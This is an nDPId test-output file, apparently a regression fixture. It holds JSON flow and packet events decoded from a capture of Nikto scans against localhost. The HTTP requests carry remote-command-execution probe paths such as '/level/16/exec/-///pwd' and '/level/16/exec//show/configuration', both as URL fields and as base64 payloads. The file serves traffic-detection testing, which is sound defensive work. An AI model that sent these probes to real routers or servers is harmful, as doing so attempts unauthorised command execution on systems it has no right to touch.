-01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"} 
-01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01083{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7440000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="} -01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
